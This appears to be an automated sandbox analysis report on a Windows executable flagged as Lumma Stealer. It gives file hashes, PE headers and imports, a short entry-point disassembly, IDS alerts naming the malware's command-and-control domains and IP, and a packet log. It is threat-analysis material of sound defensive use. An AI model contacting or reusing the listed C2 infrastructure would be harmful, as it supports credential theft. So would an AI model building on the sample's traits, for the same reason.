                                                                                                                                                                                                    SHA-512:A1D9D7E1E125ADB51A0331BCAF76957D274B91C5ACFCE027FCA34E10CED3EF0FE9581DA84DEA3785143EF7F65E5F95AE18DDC4829DA7DAF2EC65B5DA343CE16D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..f.............................'... ...@....@.. ....................................@.................................h'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..@.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID... ... ...#Blob...........WU........%3................................................................
                                                                                                                                                                                                    Process:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):23
                                                                                                                                                                                                    Entropy (8bit):2.5600289361122233
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:oWEMo6vvRya:oWEpKvD
                                                                                                                                                                                                    MD5:198AA7622D86723F12D39AA38A10C97F
                                                                                                                                                                                                    SHA1:B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
                                                                                                                                                                                                    SHA-256:88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
                                                                                                                                                                                                    SHA-512:8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:012340..1..2..3..4.....
                                                                                                                                                                                                    Process:C:\Windows\System32\w32tm.exe
                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):151
                                                                                                                                                                                                    Entropy (8bit):4.856868825134652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:VLV993J+miJWEoJ8FX5cUzu3u3AX6vo5XJXXKvj:Vx993DEU+c6UYGJJM
                                                                                                                                                                                                    MD5:EF58A06C531B8472462A3BEB4D9F5674
                                                                                                                                                                                                    SHA1:B75CB305FD1D0FFD73100566A34509EBDAB71B40
                                                                                                                                                                                                    SHA-256:A0D3288B68A68924B8D27C065A1E16FDA5034B27461DE55B6F26C42CE4830ED3
                                                                                                                                                                                                    SHA-512:554ED141B8811455EC3F95D1B99D1AD6A7E6D0775ABE2DEA442642EE9ABEE0FDA25188ACC520284165A63A65D8A623FF0354CAFF9B919B99858B10354B336C40
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 30/09/2024 14:22:53..14:22:53, error: 0x80072746.14:22:58, error: 0x80072746.
                                                                                                                                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Entropy (8bit):6.72169616575055
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                    File name:4tXm5yPtiy.exe
                                                                                                                                                                                                    File size:628'224 bytes
                                                                                                                                                                                                    MD5:cc9824f9940392c9172e05078982caab
                                                                                                                                                                                                    SHA1:0f4e458f24b461d3529ea30bbb1dbc30f8dbc1da
                                                                                                                                                                                                    SHA256:a952acc41933fa2aa78ccc28f45c25928e1ef5c3b72ef3235b99c7bd79e9de40
                                                                                                                                                                                                    SHA512:3f4e15466e35c4c6b19640659d59af783a007672d4c7ad123a604d7409b6f542f00b441ddca27b04dbe6bf34cbdb3b72873a4212824c1086d1b75f085d1ca1fc
                                                                                                                                                                                                    SSDEEP:12288:aaR0UFKC7uFFWuATtUxCj2AqeMQmHnHlaWj:puvCOFWuATtuGKFHnHlZ
                                                                                                                                                                                                    TLSH:9BD4AE4573A58BA4D277613894BBA31BF737B84857318ACB63D040642FE23E05EBB752
                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..aV..aV..aV......aV...W..aV...U..aV...R..aV...S..aV...W..aV..aW..`V..._..aV......aV...T..aV.Rich.aV........................
                                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                                    Entrypoint:0x14004b24c
                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                    Time Stamp:0x66F42F0D [Wed Sep 25 15:41:01 2024 UTC]
                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                    Import Hash:11c012ef8b8b753a6c7dfac749804464
                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                    call 00007F4FE07D841Ch
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                    jmp 00007F4FE07D7D47h
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    int3
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    mov dword ptr [esp+10h], ebx
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    mov dword ptr [esp+18h], esi
                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                    push edi
                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                    push esi
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    sub esp, 10h
                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                    cpuid
                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                    mov eax, ecx
                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                    mov edx, edx
                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                    xor edx, 49656E69h
                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                    xor eax, 6C65746Eh
                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                    mov ecx, ebx
                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                                                                    cpuid
                                                                                                                                                                                                    inc ebp
                                                                                                                                                                                                    or edx, eax
                                                                                                                                                                                                    mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                    xor ecx, 756E6547h
                                                                                                                                                                                                    mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                                    inc ebp
                                                                                                                                                                                                    or edx, ecx
                                                                                                                                                                                                    mov dword ptr [ebp-08h], ecx
                                                                                                                                                                                                    mov edi, ecx
                                                                                                                                                                                                    mov dword ptr [ebp-04h], edx
                                                                                                                                                                                                    jne 00007F4FE07D7F2Dh
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    or dword ptr [00030DDDh], FFFFFFFFh
                                                                                                                                                                                                    and eax, 0FFF3FF0h
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    mov dword ptr [00030DC5h], 00008000h
                                                                                                                                                                                                    cmp eax, 000106C0h
                                                                                                                                                                                                    je 00007F4FE07D7EFAh
                                                                                                                                                                                                    cmp eax, 00020660h
                                                                                                                                                                                                    je 00007F4FE07D7EF3h
                                                                                                                                                                                                    cmp eax, 00020670h
                                                                                                                                                                                                    je 00007F4FE07D7EECh
                                                                                                                                                                                                    add eax, FFFCF9B0h
                                                                                                                                                                                                    cmp eax, 20h
                                                                                                                                                                                                    jnbe 00007F4FE07D7EF6h
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    mov ecx, 00010001h
                                                                                                                                                                                                    add dword ptr [eax], eax
                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    bt ecx, eax
                                                                                                                                                                                                    jnc 00007F4FE07D7EE6h
                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                    mov eax, dword ptr [0004D25Fh]
                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                    or eax, 01h
                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                    mov dword ptr [0004D254h], eax
                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7945c0x1a4.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x1e8.rsrc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x990000x2dfc.pdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x9d0000x240.reloc
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x72e900x70.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x72f000x28.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x72d500x140.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x4e0000x850.rdata
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                    .text0x10000x4c3d70x4c400c5747a34f1f33916cf88280589dbd196False0.5016617571721311data6.49702196538095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rdata0x4e0000x2d89c0x2da00ef802d1d9630a559be4558b95eafa566False0.7481538955479452dBase III DBT, version number 0, next free block index 500750, 1st item "n\236\007"6.926768893851273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .data0x7c0000x1cca80x1c00044ebe2a4353395cec1acbf820001db7aFalse0.45474679129464285data5.382551139109846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                    .pdata0x990000x2dfc0x2e001a6f5aba31c429bca21c2051fd32a7f3False0.47087296195652173data5.743578448389907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rsrc0x9c0000x1e80x200031246ef171793b1fc79b2206b5d8bccFalse0.54296875data4.768131151703051IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .reloc0x9d0000x2400x4001ddc071e3c342b0e48d2b8012851326fFalse0.3994140625data3.610359463109381IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                    RT_MANIFEST0x9c0600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    d3d9.dllDirect3DCreate9Ex
                                                                                                                                                                                                    KERNEL32.dllVirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
                                                                                                                                                                                                    USER32.dllGetActiveWindow, SetClipboardData, ScreenToClient, LoadCursorA, GetKeyState, SendInput, UpdateWindow, GetClipboardData, EmptyClipboard, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, ClientToScreen, CreateWindowExA, DefWindowProcA, SetCursor, GetForegroundWindow, MessageBoxA, SetWindowLongA, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetAsyncKeyState, ShowWindow, GetSystemMetrics, SetWindowPos, SetLayeredWindowAttributes, GetClientRect, DestroyWindow, GetWindowRect, GetWindow, DispatchMessageA
                                                                                                                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation
                                                                                                                                                                                                    IMM32.dllImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
                                                                                                                                                                                                    MSVCP140.dll_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
                                                                                                                                                                                                    ntdll.dllRtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                                                                                                                                                                                                    dwmapi.dllDwmExtendFrameIntoClientArea
                                                                                                                                                                                                    VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                                                                                                                                                    VCRUNTIME140.dll__std_terminate, memchr, strstr, memcmp, memcpy, __std_exception_destroy, __std_exception_copy, memmove, __current_exception, __current_exception_context, __C_specific_handler, _CxxThrowException, memset
                                                                                                                                                                                                    api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
                                                                                                                                                                                                    api-ms-win-crt-string-l1-1-0.dllstrncpy, isprint, strcmp, _stricmp
                                                                                                                                                                                                    api-ms-win-crt-utility-l1-1-0.dllqsort, rand
                                                                                                                                                                                                    api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, _callnewh, free, malloc
                                                                                                                                                                                                    api-ms-win-crt-convert-l1-1-0.dllatof
                                                                                                                                                                                                    api-ms-win-crt-runtime-l1-1-0.dllsystem, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
                                                                                                                                                                                                    api-ms-win-crt-math-l1-1-0.dllatan2, atan2f, ceilf, cosf, asin, fmodf, pow, tanf, powf, sqrtf, __setusermatherr, floorf, sinf, sqrt
                                                                                                                                                                                                    api-ms-win-crt-filesystem-l1-1-0.dll_unlock_file, _lock_file
                                                                                                                                                                                                    api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_func, _configthreadlocale
                                                                                                                                                                                                    SHELL32.dllShellExecuteW
                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                    2024-09-30T18:25:34.002554+02002056172ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)1192.168.2.8500971.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.017153+02002056054ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)1192.168.2.8556171.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.028835+02002056040ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)1192.168.2.8637081.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.039669+02002056056ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)1192.168.2.8651961.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.053128+02002056036ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)1192.168.2.8571621.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.065314+02002056058ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)1192.168.2.8579031.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.078528+02002056046ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)1192.168.2.8532561.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.091139+02002056042ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)1192.168.2.8641561.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:34.101467+02002056052ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)1192.168.2.8535021.1.1.153UDP
                                                                                                                                                                                                    2024-09-30T18:25:36.659116+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849711104.21.84.213443TCP
                                                                                                                                                                                                    2024-09-30T18:25:36.659116+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849711104.21.84.213443TCP
                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.395369053 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.395417929 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.395494938 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.416560888 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.416583061 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.885936975 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.886002064 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.890034914 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.890047073 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.890304089 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.893358946 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.939399958 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.072649956 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.072704077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.072729111 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.072753906 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.072761059 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.072788954 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.072818041 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.073066950 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.073087931 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.073138952 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.073147058 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.073188066 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.073700905 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.077610016 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.077640057 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.077672958 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.077688932 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.077745914 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.561990976 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562055111 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562081099 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562089920 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562107086 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562129974 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562153101 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562170029 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562199116 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562206984 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562216997 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562249899 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562256098 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562289000 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562314034 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562345982 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562351942 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562378883 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562407017 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562412977 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562418938 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562463999 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562465906 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562477112 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562504053 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.562519073 CEST44349706188.114.96.3192.168.2.8
